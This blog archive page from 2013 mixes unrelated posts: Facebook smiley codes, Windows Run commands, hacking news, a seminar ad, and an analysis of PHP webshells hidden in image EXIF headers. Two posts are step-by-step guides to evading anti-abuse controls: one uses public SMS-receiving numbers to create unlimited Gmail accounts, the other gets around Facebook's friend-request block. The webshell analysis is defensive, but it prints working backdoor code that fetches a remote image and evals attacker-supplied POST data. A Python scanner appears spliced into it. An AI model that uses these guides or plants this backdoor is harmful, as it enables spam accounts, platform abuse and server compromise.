Thursday 31 October 2013

Hi Guys, Here we have some New smileys For Facebook Chat :-p


[[171108522930776]] Troll Face
[[164413893600463]] MEGUSTA
[[218595638164996]] YAO
[[189637151067601]] Lol
[[129627277060203]] Poker face.
[[227644903931785]] Forever ALONE.
[[100002752520227]] OKAY
[[105387672833401]] F**K YEA.
[[100002727365206]] CH AC.
[[125038607580286]] Forever alone navidad.
[[143220739082110]] FK KIDDING ME.
[[168040846586189]] Feel like a Sir.
[[169919399735055]] NOT BAD
[[142670085793927]] M O G.
[[170815706323196]] Cereal Guy
[[167359756658519]] NO
[[224812970902314]] Derp
[[192644604154319]] Derpina


Enjoy !!!!!!!!!!!!

Bypass Phone and SMS verification of Any Website

Brisk

Nowadays, most websites require SMS verification, including Google, Facebook, YouTube and many survey websites.
First of all, we should understand why an SMS and phone verification system is important:

* Keep More Visitors for Market
* Providing Extra Security for their Website
* Keep Spammers out
* Daily advertisements and promotional messages
 
Instead, we can create Gmail (Facebook, YouTube, other shopping site) accounts without SMS verification. Gmail allows only a few accounts per mobile number; when you try to create more accounts with the same number, Google restricts you and you can’t create any more. With the following steps we can create countless Gmail accounts.
This method is useful for bypassing SMS verification when you need to sign up for an account and do not feel comfortable giving your real number, or when you want to create multiple accounts.
Let's start step by step:

1) First go to this website: Receive-Sms Online
2) Copy any one number and paste it where SMS verification is requested.



3) Simply come back and click the number you selected; there you will find the code sent by Google, YouTube or whatever else.

Wednesday 30 October 2013

Useful run commands for windows 7

Like everyone says, time is gold. Every single second is precious and time is not to be wasted. Do you notice that sometimes we actually use up to 10 seconds to open a Windows program? With today's tip, you can probably open any program in less than 5 seconds. So now I’m going to show you a list of general and common commands that you can use in the Run option from the Start menu (Start > Run box). I consider this tip somewhat advanced, but if you get this into your head early on and spend some time familiarizing yourself with it, you can be a PRO at computing shortcuts!


This list is quite long and extensive. If you can’t memorize all these right away, you can always come back here and check out the commands you need when you wish to open certain windows programs. (Bookmark this page!)

Additional advice: I strongly recommend you use SlickRun. SlickRun is simply another “run option” that is much simpler to use.

SlickRun is a free floating command line utility for Windows. SlickRun gives you almost instant access to any program or website. SlickRun allows you to create command aliases (known as MagicWords), so C:\Program Files\Outlook Express\msimn.exe becomes MAIL.

Enter a web URL into SlickRun and it will launch your browser and navigate to the specified address. Run multiple programs in a few keystrokes, jot a note, look up a definition… SlickRun is the most natural way to interact with your computer.


Alright, here we go.


Windows logo key + R

Administrative Tools
Administrative Tools = control admintools
Authorization Manager = azman.msc
Component Services = dcomcnfg
Certificate Manager = certmgr.msc
Direct X Troubleshooter = dxdiag
Display Languages = lpksetup
ODBC Data Source Administrator = odbcad32
File Signature Verification Tool = sigverif
Group Policy Editor = gpedit.msc
Add Hardware Wizard = hdwwiz.cpl
iSCSI Initiator = iscsicpl
Iexpress Wizard = iexpress
Local Security Settings = secpol.msc
Microsoft Support Diagnostic Tool = msdt
Microsoft Management Console = mmc
Print management = printmanagement.msc
Printer User Interface = printui
Problem Steps Recorder = psr
People Near Me = p2phost
Registry Editor = regedit or regedt32
Resource Monitor = resmon
System Configuration Utility = msconfig
Resultant Set of Policy = rsop.msc
SQL Server Client Configuration = cliconfg
Task Manager = taskmgr
Trusted Platform Module = tpm.msc
TPM Security Hardware = TpmInit
Windows Remote Assistance = msra
Windows Share Folder Creation Wizard = shrpubw
Windows Standalone Update Manager = wusa
Windows System Security Tool = syskey
Windows Script Host Settings = wscript
Windows Version = winver
Windows Firewall with Advanced Security = wf.msc
Windows Memory Diagnostic = MdSched
Windows Malicious Removal Tool = mrt

Computer Management
Computer Management = compmgmt.msc or CompMgmtLauncher
Task Scheduler = control schedtasks
Event Viewer = eventvwr.msc
Shared Folders/MMC = fsmgmt.msc
Local Users and Groups = lusrmgr.msc
Performance Monitor = perfmon.msc
Device Manager = devmgmt.msc
Disk Management = diskmgmt.msc
Services = services.msc
Windows Management Infrastructure = wmimgmt.msc

Control Panel
Control Panel = control
Action Center= wscui.cpl
Autoplay = control.exe /name Microsoft.autoplay
Backup and Restore = sdclt
Create a System Repair disc = recdisc
BDE Administrator = bdeadmin.cpl
Color Management = colorcpl
Credential Manager = control.exe /name Microsoft.CredentialManager
Credential Manager Stored User Names and Passwords = credwiz
Date and Time Properties = timedate.cpl
Default Programs = control.exe /name Microsoft.DefaultPrograms
Set Program Access and Computer Defaults = control appwiz.cpl,,3 or ComputerDefaults
Devices and Printers = control printers
Devices and Printers Add a Device = DevicePairingWizard
Display = dpiscaling
Screen Resolution = desk.cpl
Display Color Calibration = dccw
Cleartype Text Tuner = cttune
Folders Options = control folders
Fonts = control fonts
Getting Started = GettingStarted
HomeGroup = control.exe /name Microsoft.HomeGroup
Indexing Options = control.exe /name Microsoft.IndexingOptions
Internet Properties = inetcpl.cpl
Keyboard = control keyboard
Location and Other Sensors = control.exe /name Microsoft.LocationandOtherSensors
Location Notifications = LocationNotifications
Mouse = control mouse or main.cpl
Network and Sharing Center = control.exe /name Microsoft.NetworkandSharingCenter
Network Connections = control netconnections or ncpa.cpl
Notification Area Icons = control.exe /name Microsoft.NotificationAreaIcons
Parental Controls = control.exe /name Microsoft.ParentalControls
Performance Information = control.exe /name Microsoft.PerformanceInformationandTools
Personalization = control desktop
Windows Color and Appearance = control color
Phone and Modem Options = telephon.cpl
Power Configuration = powercfg.cpl
Programs and Features = appwiz.cpl or control appwiz.cpl
Optional Features Manager = optionalfeatures or control appwiz.cpl,,2
Recovery = control.exe /name Microsoft.Recovery
Regional and Language = intl.cpl
RemoteApp = control.exe /name Microsoft.RemoteAppandDesktopConnections
Sound = mmsys.cpl
Volume Mixer = sndvol
System Properties = sysdm.cpl or Windows logo key + Pause/Break
SP ComputerName Tab = SystemPropertiesComputerName
SP Hardware Tab = SystemPropertiesHardware
SP Advanced Tab = SystemPropertiesAdvanced
SP Performance = SystemPropertiesPerformance
SP Data Execution Prevention = SystemPropertiesDataExecutionPrevention
SP Protection Tab = SystemPropertiesProtection
SP Remote Tab = SystemPropertiesRemote
Windows Activation = slui
Windows Activation Phone Numbers = slui 4
Taskbar and Start Menu = control.exe /name Microsoft.TaskbarandStartMenu
Troubleshooting = control.exe /name Microsoft.Troubleshooting
User Accounts = control.exe /name Microsoft.UserAccounts
User Account Control Settings = UserAccountControlSettings
User Accounts Windows 2000/domain version = netplwiz or control userpasswords2
Encryption File System = rekeywiz
Windows Anytime Upgrade = WindowsAnytimeUpgradeui
Windows Anytime Upgrade Results = WindowsAnytimeUpgradeResults
Windows CardSpace = control.exe /name Microsoft.cardspace
Windows Firewall = firewall.cpl
WindowsSideshow = control.exe /name Microsoft.WindowsSideshow
Windows Update App Manager = wuapp

Accessories
Calculator = calc
Command Prompt = cmd
Connect to a Network Projector = NetProj
Presentation Settings = PresentationSettings
Connect to a Projector = displayswitch or Windows logo key + P
Notepad = notepad
Microsoft Paint = mspaint.exe
Remote Desktop Connection = mstsc
Run = Windows logo key + R
Snipping Tool = snippingtool
Sound Recorder = soundrecorder
Sticky Note = StikyNot
Sync Center = mobsync
Windows Mobility Center (Only on Laptops) = mblctr or Windows logo key + X
Windows Explorer = explorer or Windows logo key + E
Wordpad = write
Ease of Access Center = utilman or Windows logo key + U
Magnifier = magnify
Narrator = Narrator
On Screen Keyboard = osk
Private Character Editor = eudcedit
Character Map = charmap
Digitizer Calibration Tool = tabcal
Disk Cleanup Utility = cleanmgr
Defragment User Interface = dfrgui
Internet Explorer = iexplore
Rating System = ticrf
Internet Explorer (No Add-ons) = iexplore -extoff
Internet Explorer (No Home) = iexplore about:blank
Phone Dialer = dialer
Printer Migration = PrintBrmUi
System Information = msinfo32
System Restore = rstrui
Windows Easy Transfer = migwiz
Windows Media Player = wmplayer
Windows Media Player DVD Player = dvdplay
Windows Fax and Scan Cover Page Editor = fxscover
Windows Fax and Scan = wfs
Windows Image Acquisition = wiaacmgr
Windows PowerShell ISE = powershell_ise
Windows PowerShell = powershell
XPS Viewer = xpsrchvw

Open Documents folder = documents
Open Pictures folder = pictures
Open Music folder = music
Open Videos folder = videos
Open Downloads folder = downloads
Open Favorites folder = favorites
Open Recent folder = recent
Logs out of Windows = logoff
Locks User Account = Windows logo Key + L


Use shortcuts and have fun :)




How to send friend request when you get blocked - Best way





Facebook is a great social networking website through which we can stay connected with friends, relatives and other people. But Facebook does not allow you to add strangers as friends. You have probably gone through a stage at least once in your Facebook account when a message appears saying that sending friend requests is blocked for 1 day, 3 days, or even 30 days. While blocked, you cannot send a friend request to anyone, whether you know them or not. This is because Facebook does not let you send friend requests to unknown people, considers doing so spam, and therefore temporarily disables sending friend requests when you violate its rules. This is generally done to protect people's privacy, since some people add strangers as friends in order to misuse that connection.

However, sometimes you may even get blocked when you send friend requests to people you know but already have a lot of friend requests pending approval. I have also gone through this same stage and felt helpless that I couldn't send friend requests to dear friends. So today I will tell you an easy trick with which you can send friend requests even if you are blocked.


OK, let's start:
1. Open this link: https://www.facebook.com/?sk=ff
2. Then click on "Other Tools".




If you don’t know the easiest way to make a contact file, follow these steps.

    Open a new text document (.txt) in Notepad.
    Add all the email addresses separated by commas ( , ).
    Now save that file with the extension .vcf.
    This is your contact file.
    Now upload this file to Facebook and you will be prompted to send friend requests.

Click “OK” and you’re done.
Simple yet effective! Your friend requests will be sent to the desired people.



Tuesday 29 October 2013

Twitter account of Malindo Air hacked





Malindo Air, an airline based in Malaysia, lost control of its tweets after hackers hijacked its Twitter account. The hacker managed to tweet a false message saying "Dear all, in view of the recent events, Malindo Air is giving away 100,000 free seats from today till end of the week." When Malaysian politician Tony Pua retweeted it and asked "Hacked or real?", the hackers responded with "damn real, yb".

However, a Malindo Air representative told local news that the airline is not giving away 100,000 free seats and apologized for the inconvenience: "Dear All, our twitter account has been hacked. Please do not entertain the hacker. We will get to the bottom of this problem. Thank you." It appears they have not yet recovered the account, as the tweet posted by the hacker still appears even after 20 hours.

US denies Barack Obama knew of Angela Merkel surveillance


Washington, Oct 28: The US has dismissed reports that President Barack Obama was informed about the tapping of Angela Merkel's mobile phone, even as an American daily on Monday said that spying of as many as 35 world leaders, including the German Chancellor, ended when it was brought to his notice.

The National Security Agency has refuted that it ever discussed such spying programmes, in particular those of Merkel, with Obama. "(NSA Director) Gen (Keith) Alexander did not discuss with President Obama in 2010 an alleged foreign intelligence operation involving German Chancellor Merkel, nor has he ever discussed alleged operations involving Chancellor Merkel. News reports claiming otherwise are not true," NSA spokesperson Vanee' Vines said in a statement. The denial came after a report by the Bild am Sonntag newspaper said Obama had already been informed about the NSA's tapping of Merkel's mobile phone in 2010 by its director. The President "not only did not stop the operation, but he also ordered it to continue," a high-ranking NSA official was quoted as saying by the paper.



A media report also said that Merkel's surveillance may have begun as early as 2002. Meanwhile, The Wall Street Journal today reported that Obama was unaware that his own NSA monitored the cell phone communications of as many as 35 world leaders, including those of France and Germany.

The spying programme ended this summer when it was first brought to his notice, the report said. The reports of such spying programmes, derived from documents acquired from former CIA contractor Edward Snowden, have outraged a number of European leaders in particular those of France and Germany and has badly damaged the US relationship with these countries.

The report, quoting unnamed US officials, said the White House cut off some monitoring programmes after learning of them, including the one tracking Merkel and some other world leaders. Other programmes have been slated for termination but have not been phased out completely yet, officials said.


Thursday 24 October 2013

Live Hacking & Information Security free seminar @ Nungampakkam, Chennai Sunday, October 27, 2013 from 4:00 PM to 6:00 PM (IST) CHENNAI,






Hi Folks,

Brisk Info Sec Proudly presents 
FREE Ethical Hacking & Information Security boot camp on 27/10/2013 Sunday at 04:00pm to 06:00pm,
http://briskinfosecurity.eventbrite.com/
Hurry !!! Only Limited Seats are available !!!

Phone  :09962208446

Email : info@briskinfosec.com, briskinfosec@gmail.com

Website: www.briskinfosec.com

Venue:
150 FIRST FLOOR
OFFICE NUMBER 1- DHARMA TOWERS
NELSON MANILKKAM ROAD,CHOOLAI MEDU
CHENNAI-600094

Make a Note:
1) Be On-time.
2) Take a printout of Free pass.
3) It's absolutely free and there are no hidden charges.
4) Demos and explanations are fully practical and are only for educational purposes.
5) Attendees are responsible if they harm other people, directly or indirectly, with what they learn at the BriskInfoSec seminar.
6) Only Registered candidates are eligible to attend our seminar.
7) This seminar will teach you about demand of Information security professionals and guide the same.
8) We are specially inviting working professionals(Developers, Testers, System admins,  Network admins, College students, CISSP Preparation, CEH Preparation, Security audit people).
9) Share this post on your social networking site (Facebook, Linkedin, Google+) to make awareness as a hacker.  

Friday 18 October 2013

Hiding Webshell Backdoor Code in Image Files

First appearances may be deceiving...  Web attackers have been using a method of stashing pieces of their PHP backdoor exploit code within the meta-data headers of image files to evade detection.  This is not a completely new tactic; however, it is not as well known by the defensive community, so we want to raise awareness.  Let's first take a quick look at why this technique is being utilized by attackers.

Standard Webshell Backdoor Code

There are many methods attackers employ to upload webshell backdoor code onto compromised web servers, including Remote File Inclusion (RFI), the WordPress TimThumb plugin and even non-web attack vectors such as stolen FTP credentials.  Here is a graphic taken from this year's Trustwave SpiderLabs Global Security Report that lists the top malicious file types uploaded to compromised web servers:
[Figure: top malicious file types uploaded to compromised web servers, from the Trustwave SpiderLabs Global Security Report]
Let's take a look at a standard obfuscated R57 shell example:
[Screenshot: obfuscated R57 shell source, Base64 encoded parameter data followed by a PHP eval call]

Notice the Base64 encoded parameter data and then the PHP Eval call at the end.  Once PHP executes this code, it will decode and inflate the data stream and the result will be a basic file uploader webshell similar to the following:
[Screenshot: the decoded result, a basic file uploader webshell]

Incident Response Steps - Identification and Eradication  

These types of attacks and compromises are especially prevalent in shared hosting environments, where end users do not properly update their web application software.  In response to these scenarios, hosting provider security teams often employ OS-level back-end processes that scan the local file systems looking for tell-tale signs of webshell backdoor code.  One example tool is called MalDetect (Linux Malware Detect).  This script can be run to analyze files and detect various forms of malicious code.  If we run maldetect against our example R57 webshell file we get the following:
$ sudo /usr/local/maldetect/maldet --config-option quar_hits=0,quar_clean=0,clamav_scan=1 -a "/tmp/lin.php"
Linux Malware Detect v1.4.2
            (C) 2002-2013, R-fx Networks <proj@r-fx.org>
            (C) 2013, Ryan MacDonald <ryan@r-fx.org>
inotifywait (C) 2007, Rohan McGovern <rohan@mcgovern.id.au>
This program may be freely redistributed under the terms of the GNU GPL v2

maldet(92294): {scan} signatures loaded: 9011 (7145 MD5 / 1866 HEX)
maldet(92294): {scan} building file list for /tmp/lin.php, this might take awhile...
maldet(92294): {scan} file list completed, found 1 files...
maldet(92294): {scan} 1/1 files scanned: 0 hits 0 cleaned
maldet(92294): {scan} scan completed on /tmp/lin.php: files 1, malware hits 1, cleaned hits 0
maldet(92294): {scan} scan report saved, to view run: maldet --report 101113-1250.92294
maldet(92294): {scan} quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 101113-1250.92294
$ sudo maldet --report 101113-1250.92294
malware detect scan report for MacBook-Pro-2.local:
SCAN ID: 101113-1250.92294
TIME: Oct 11 12:50:48 -0400
PATH: /tmp/lin.php
TOTAL FILES: 1
TOTAL HITS: 1
TOTAL CLEANED: 0

NOTE: quarantine is disabled! set quar_hits=1 in conf.maldet or to quarantine results run: maldet -q 101113-1250.92294
FILE HIT LIST:
{MD5}base64.inject.unclassed.1 : /tmp/lin.php
===============================================
Linux Malware Detect v1.4.2 < proj@rfxn.com >

As you can see, maldetect identified this PHP file with one of its generic base64 injection signatures.  While this individual file scanning does work, for manageability most organizations opt to run maldetect as part of an ongoing automated process run through scheduling tools such as cron.  The big problem with this process is that, for performance reasons, many organizations opt to only scan PHP files and exclude other file types from being scanned...

Hiding Webshell Backdoor Code in Image Files 

This brings us back to the beginning of the blog post.  Due to the cleanup tactics used by most organizations, the bad guys had to figure out a method of hiding their backdoor code in places that most likely would not be inspected.  In this case, we are talking about hiding PHP code within the EXIF image header fields.  The concept of steganography is not new and there have been many past examples of its use for passing data; however, we are now seeing it used for automated code execution.  I do want to give a proper hat-tip to the Sucuri Research Team, who also found similar techniques being employed.

PHP Code In EXIF Headers

If you were to view-source in a browser or use something like the unix strings command, you could see the new code added to the top of the image files:
[Screenshot: strings output showing the PHP code added at the top of the image file]

After uploading this file to VirusTotal, you can see a more friendly representation of the EXIF fields:
[Screenshot: VirusTotal view of the EXIF fields, with PHP code in the Make and Model fields]
As you can see, the PHP code is held within the EXIF "Model" and "Make" fields.  This data does not in any way interfere with the proper rendering of the image file itself.

PHP's exif_read_data function

PHP has a function called exif_read_data which allows it to read the header data of image files.  It is used extensively in many different plugins and tools.  Here is an example from Facebook's GitHub repo:
[Screenshot: exif_read_data usage in code from Facebook's GitHub repo]

Updated PHP Webshell Code

So, with pieces of their webshell stashed away within the EXIF headers of either local or remote image files, the attackers can then modify their PHP code to leverage the PHP exif_read_data function like this:
<?php
$exif = exif_read_data('http://REDACTED/images/stories/Logo_Coveright.jpg');
preg_replace($exif['Make'],$exif['Model'],'');
?>
The first line downloads a remote JPEG image file with the stashed code in it and then sets the $exif variable to the returned array.  We can simulate this by modifying the PHP code to download the same file and then dump the $exif data:
<?php
$exif = exif_read_data('http://REDACTED/images/stories/Logo_Coveright.jpg');
var_dump($exif);
?>
When executing this php file, we get the following output:
$ php ./exif_dumper.php
array(9) {
  ["FileName"]=>
  string(18) "Logo_Coveright.jpg"
  ["FileDateTime"]=>
  int(0)
  ["FileSize"]=>
  int(6159)
  ["FileType"]=>
  int(2)
  ["MimeType"]=>
  string(10) "image/jpeg"
  ["SectionsFound"]=>
  string(13) "ANY_TAG, IFD0"
  ["COMPUTED"]=>
  array(5) {
    ["html"]=>
    string(23) "width="155" height="77""
    ["Height"]=>
    int(77)
    ["Width"]=>
    int(155)
    ["IsColor"]=>
    int(1)
    ["ByteOrderMotorola"]=>
    int(0)
  }
  ["Make"]=>
  string(5) "/.*/e"
  ["Model"]=>
  string(108) "eval(base64_decode('aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));"
}
The final step in this process is to execute the PHP preg_replace function.
<?php
$exif = exif_read_data('http://REDACTED/images/stories/Logo_Coveright.jpg');
preg_replace($exif['Make'],$exif['Model'],'');
?>
Notice that the $exif['Make'] variable data uses the "/.*/e" PCRE regex with the e modifier (PREG_REPLACE_EVAL), which causes the replacement string from the $exif['Model'] variable to be evaluated as PHP code.  In this case, it executes the base64_decode call, which results in the following PHP snippet of code:
if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}
This code checks to see if there is a POST parameter named "zz1" and, if there is, evals its contents.  This makes it quite easy for attackers to sprinkle backdoor access code around by injecting other legitimate PHP files with this combination of exif_read_data and preg_replace code.

How Widespread?

We cannot accurately estimate how widely this technique is being used; however, there is a small amount of empirical evidence from simply using public search engines to flag any web pages that list characteristics of EXIF code hiding, or by searching for this specific base64 encoded string value.
[Screenshot: search engine results for the base64 encoded string]
There are hundreds of examples of this base64 encoded data being present within image files.

Recommendations

Scan All Files for Malicious Code

If you are running OS level scanning of files on disk, carefully consider which file-types you want to include/exclude.  As this scenario shows, attackers can take advantage of your excluded content to hide their code.

Scan Files During Attachment Uploading using ModSecurity

When end users are uploading images as file attachments, ModSecurity has the ability to:
  1. Extract the file and dump it to a tmp file on disk
  2. Execute the @inspectFile operator to analyze the file
  3. Block uploading if malware is found
The maldetect README file even includes instructions on how to integrate it with ModSecurity:
.: 12 [ MODSECURITY2 UPLOAD SCANNING ]

The support for HTTP upload scanning is provided through mod_security2's inspectFile hook.
This feature allows for a validation script to be used in permitting or denying an upload. 

The convenience script to facilitate this is called modsec.sh and is located in the
/usr/local/maldetect installation path. The default setup is to run a standard maldet scan
with no clamav support, no cleaner rule executions and quarantining enabled; these options
are set in the interest of performance vs accuracy which is a fair tradeoff. 

The scan options can be modified in the modsec.sh file if so desired, the default
scan options are as follows:
--config-option quar_hits=1,quar_clean=0,clamav_scan=0 --modsec -a "$file"

There is a tangible performance difference in disabling clamav scanning in this usage
scenario. The native LMD scanner engine is much faster than the clamav scanner engine
in single file scans by a wide margin. A single file scan using clamav takes roughly
3sec on average while the LMD scanner engine takes 0.5sec or less.

To enable upload scanning with mod_security2 you must enable the public_scan option
in conf.maldet (public_scan=1) then add the following rules to your mod_security2 
configuration. These rules are best placed in your modsec2.user.conf file on cpanel servers
or at the top of the appropriate rules file for your setup.

/usr/local/apache/conf/modsec2.user.conf (or similar mod_security2 rules file):
SecRequestBodyAccess On
SecRule FILES_TMPNAMES "@inspectFile /usr/local/maldetect/modsec.sh" \
                "log,auditlog,deny,severity:2,phase:2,t:none"

A restart of the HTTPd service is required following these changes.

When an upload takes place that is determined to be malware, it will be rejected and an
entry will appear in the mod_security2 SecAuditLog file. On cpanel servers and most
configurations this is the modsec_audit.log located under /usr/local/apache/logs or 
/var/log/httpd.

The log entry will appear similar to the following:
Message: Access denied with code 406 (phase 2). File "/tmp/20111120-....-file" rejected by
the approver script "/usr/local/maldetect/modsec.sh": 0 maldet: {HEX}php.cmdshell.r57.317
/tmp/20111120-....-file [file "/usr/local/apache/conf/modsec2.user.conf"] [line "3"]
[severity "CRITICAL"]
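The two gaps the post describes, scanners that skip image files and upload pipelines that never look inside EXIF, can be closed with a small approver of your own. The following Python script is an added example, not code from the SpiderLabs post or from maldetect: it walks a JPEG's marker segments, parses the IFD0 ASCII tags of the APP1/Exif block, and flags Make/Model values that look like the stash described above (a "/.*/e" regex, eval or base64_decode calls, a PHP open tag, a request superglobal). The verdict comes back in the shape ModSecurity's @inspectFile contract expects, "1" to allow and "0 <reason>" to deny, as the maldet log line in the README shows. The tag names, the indicator regexes, the "exif-scan" label and the build_jpeg helper (which constructs a header-only test file, not a renderable image) are my own choices; the 'Li4u' payload is a placeholder that decodes to "...". Note that the /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so the script also looks for the eval and base64_decode sinks that survive it.

```python
"""Scan a JPEG's EXIF Make/Model strings for stashed PHP code (added example)."""
import re
import struct
import sys

# EXIF/TIFF tag numbers for the two fields abused in the post.
TAG_NAMES = {0x010F: "Make", 0x0110: "Model"}
ASCII = 2  # TIFF field type for NUL-terminated ASCII strings

# Constructed indicators (my own choice, not maldetect signatures).
INDICATORS = [
    ("pcre-e-modifier", re.compile(r"^/.*/[A-Za-z]*e[A-Za-z]*$")),  # PREG_REPLACE_EVAL
    ("eval-call", re.compile(r"\beval\s*\(")),
    ("base64-decode", re.compile(r"\bbase64_decode\s*\(")),
    ("php-open-tag", re.compile(r"<\?(php)?")),
    ("request-superglobal", re.compile(r"\$_(POST|GET|REQUEST)\b")),
]


def build_jpeg(make: bytes, model: bytes) -> bytes:
    """Build a header-only JPEG (SOI, APP1/Exif, EOI) whose IFD0 holds Make and Model."""
    entries = [(0x010F, make + b"\0"), (0x0110, model + b"\0")]
    ifd_offset = 8                                # IFD0 follows the 8-byte TIFF header
    data_offset = ifd_offset + 2 + 12 * len(entries) + 4
    ifd, data = struct.pack(">H", len(entries)), b""
    for tag, value in entries:
        if len(value) <= 4:                       # short values live inside the entry
            ifd += struct.pack(">HHI4s", tag, ASCII, len(value), value.ljust(4, b"\0"))
        else:                                     # long values are stored after the IFD
            ifd += struct.pack(">HHII", tag, ASCII, len(value), data_offset + len(data))
            data += value
    ifd += struct.pack(">I", 0)                   # no IFD1
    tiff = b"MM\x00\x2a" + struct.pack(">I", ifd_offset) + ifd + data
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def parse_tiff(tiff: bytes) -> dict:
    """Return the ASCII tags of IFD0 as {name: str}, honouring the byte-order mark."""
    endian = {b"MM": ">", b"II": "<"}[tiff[:2]]
    (ifd_offset,) = struct.unpack(endian + "I", tiff[4:8])
    (count,) = struct.unpack(endian + "H", tiff[ifd_offset:ifd_offset + 2])
    tags = {}
    for i in range(count):
        e = ifd_offset + 2 + 12 * i
        tag, typ, n = struct.unpack(endian + "HHI", tiff[e:e + 8])
        if typ != ASCII:
            continue
        if n <= 4:
            raw = tiff[e + 8:e + 8 + n]
        else:
            (off,) = struct.unpack(endian + "I", tiff[e + 8:e + 12])
            raw = tiff[off:off + n]
        tags[TAG_NAMES.get(tag, hex(tag))] = raw.rstrip(b"\0").decode("latin-1")
    return tags


def read_exif_strings(jpeg: bytes) -> dict:
    """Walk the JPEG marker segments and parse the first APP1/Exif block found."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):                # EOI or SOS: no more header segments
            break
        (seg_len,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        segment = jpeg[pos + 4:pos + 2 + seg_len]
        if marker == 0xE1 and segment.startswith(b"Exif\x00\x00"):
            return parse_tiff(segment[6:])
        pos += 2 + seg_len
    return {}


def find_indicators(tags: dict) -> list:
    """List 'Field:indicator' strings for every suspicious tag value."""
    hits = []
    for name, value in tags.items():
        for label, pattern in INDICATORS:
            if pattern.search(value):
                hits.append(f"{name}:{label}")
    return hits


def approve(jpeg: bytes) -> str:
    """Verdict in @inspectFile form: '1' allows the upload, '0 reason' denies it."""
    try:
        hits = find_indicators(read_exif_strings(jpeg))
    except (ValueError, KeyError, struct.error) as exc:
        return f"0 exif-scan: unparsable image ({exc})"
    return "0 exif-scan: " + ", ".join(hits) if hits else "1"


# Constructed samples: a camera-like header and one mimicking the stash in the post.
BENIGN = build_jpeg(b"Canon", b"Canon EOS 5D")
STASHED = build_jpeg(b"/.*/e", b"eval(base64_decode('Li4u'));")  # 'Li4u' is a placeholder

if __name__ == "__main__":
    # As an approver script: python exif_scan.py /tmp/upload.jpg
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else STASHED
    print(approve(blob))
```

Wired in the same way the README wires modsec.sh (SecRule FILES_TMPNAMES "@inspectFile /path/to/exif_scan.py"), the script rejects the stashed sample while passing the camera header; for on-disk scanning it can be pointed at every image under the web root rather than only at *.php, which is the exclusion the post warns about.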

Teenager hacked Web sites globally

New Taipei City (新北市) police on Tuesday arrested a 16-year-old high-school student who allegedly hacked more than 1,237 Web sites across the globe and was ranked 19th in the world on the Global Hack Website Statistics site.
According to the police department’s criminal investigation division, the teenager, surnamed Hsu (許), who uses the online name “XerL9meI,” began hacking Web sites in July this year and had hacked into the Web sites of Kinmen County’s education bureau, National Central University, Tamkang University and private corporations, as well as government agencies in China and India.
Hsu was quoted by police as saying that he learned how to hack Web sites by reading books and buying certain computer programs, and he thought his IP address could not be traced. The police said they were able to trace him to his IP address through messages he left on the Web sites he had hacked.
According to police, Hsu looked for loopholes in Web sites’ SQL coding language and used them to bypass firewalls and obtain administrator privileges by cracking the passwords. He then uploaded his trademark message, which read: “You got hacked by XerLme9,” along with a warning that the Web site was unsafe.
While Hsu was quoted by police as admitting to hacking the Web sites, which would be a violation of Article 358 of the Criminal Code if prosecutors decided to press charges — punishable by three years in prison, detention or more than NT$100,000 (US$3,400) in fines — he said he was only a “gray hat hacker” who wished to remind the corporations he had hacked that their Web sites’ information security had loopholes.
Head of the criminal investigation division Lu Yue-cheng (呂岳城) said that though Hsu’s actions — having hacked the national land resources Web site of the Ruzhou city government in China’s Henan Province — could be considered an anti-United Front (統戰) act, it was nonetheless illegal.
The police had released Hsu into the custody of his grandparents, who are his legal guardians because Hsu’s parents had separated when he was very young and his father is in a vegetative state after a car accident last year.
Hsu’s grandparents said Hsu did not do well in school and often cloistered himself in his room, adding that they did not really know what he was up to.
“We would like to thank the police for nipping the flower in the bud, so to speak,” they said, adding that they would keep an eye on Hsu and try not to let him sink any deeper into the world of hacking.
As the arrest had been the second of a teenaged hacker in Taiwan, after the arrest of a 14-year-old youth in Taoyuan County last year, the New Taipei City police department’s criminal investigation division expressed concern about the trend of ever-younger hackers being apprehended.
The youths might glorify other hackers, or may simply want to prove themselves or have something to brag about, the police department said, adding that in the information age, access to hacking-related books and computer programs was too easy.
“We fear that more juvenile hackers would start to try their hand at hacking in the future,” police officers said, issuing a call for governmental and private organizations to reinforce their Web sites’ information security.
Police said that if members of the public’s personal data were extracted by hackers from organizations’ data banks, the organizations would be held complicit for violating the Personal Information Protection Act (個人資料保護法).

Think China is the No. 1 Country for Hacking? Think Again.

China has earned a reputation as the hacker capital of the world, but a new report shows the bulk of global cyber-attack activity has recently come from its smaller neighbor Indonesia.
Thirty-eight percent of cyber attacks originated in Indonesia during the second quarter of 2013, up from 21 percent in the first quarter, according to a report by security cloud platform Akamai. This spike helped push China off the hacking pedestal, with the world's most populous country accounting for 33 percent of attacks, down from 34 percent in the previous quarter. The U.S. rounded out the top three, generating 6.9 percent of cyber-attack traffic, a decrease from 8.3 percent.
Indonesia and China alone accounted for more than half of all cyber-attack activity during the quarter.
While it may seem like Indonesia came out of nowhere to take the lead (last year the country accounted for on average less than one percent of cyber crimes), hackers may be taking advantage of its increase in connection and weakening IT structure.
The country's average internet connection speed increased 125 percent in the second quarter from the same time last year. That, coupled with the fact the country isn't spending a whole lot of cash on its infrastructure,  may make the country a haven for cybercriminals.
Related: Cyber Security a Growing Issue for Small Business 
In January, hacker group Anonymous Indonesia claimed responsibility for defacing 12 government websites with the tagline "No Army Can Stop an Idea" shown on the sites. In April, the country's defense minister Purnomo Yusgiantoro announced they were building a Cyber Defense Center to take on hackers. Microsoft also felt the supposed wrath of Indonesia criminals (among others) when it put the kibosh on a cybercrime operation in June.
Akamai's findings are based on agents that log connection attempts, which the company classifies as attack traffic; from these it determines the top countries from which attacks originate. One caveat to keep in mind: the country an IP address is assigned to may not be the nation where the attacker resides, so an attacker operating from France could be using an address that geolocates to China.
To check out more of Akamai's findings, check out the highlights below (infographic not reproduced here).


Hacking Facebook ads using Google+ Circles : Target your Audience





